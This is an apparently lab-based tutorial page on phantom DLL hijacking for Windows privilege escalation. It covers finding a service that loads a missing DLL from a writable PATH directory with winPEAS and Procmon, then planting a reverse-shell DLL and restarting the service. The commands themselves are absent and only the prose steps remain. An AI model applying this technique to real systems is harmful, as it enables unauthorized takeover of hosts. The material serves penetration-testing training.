Phantom DLL Hijacking / Replacement
In this type of DLL we target a missing dll and place our own dll instead.
Finding the target
Use winPEAS to enumerate non-Windows services:
Note that the C:\Temp directory is writable and in the PATH. Start by enumerating which of these services our user has stop and start access to:
The “dllsvc” service is vulnerable to DLL Hijacking. According to the winPEAS output, the service runs the dllhijackservice.exe executable. We can confirm this manually:
in a real-world scenario we would download the executable to our own windows machine of analysis.then create a new service for the binary file that we copied and give it the path of the service binary and continue to the next steps:
create a service for the binary in our own system
Run Procmon64.exe with administrator privileges. Press Ctrl+L to open the Filter menu.
Add a new filter on the Process Name matching dllhijackservice.exe
On the main screen, deselect registry activity and network activity.
Start the service:
Back in Procmon, note that a number of “NAME NOT FOUND” errors appear, associated with the hijackme.dll file.
At some point, Windows tries to find the file in the C:\Temp directory, which as we found earlier, is writable by our user.
Exploitation
On Kali, generate a reverse shell DLL named hijackme.dll:
Copy the DLL to the Windows VM and into the C:\Temp directory. Start a listener on Kali and then stop/start the service to trigger the exploit:
In case of an existing DLL, if we have write access to that directory, we can replace it with our own malicious DLL and restart the service.
Last updated
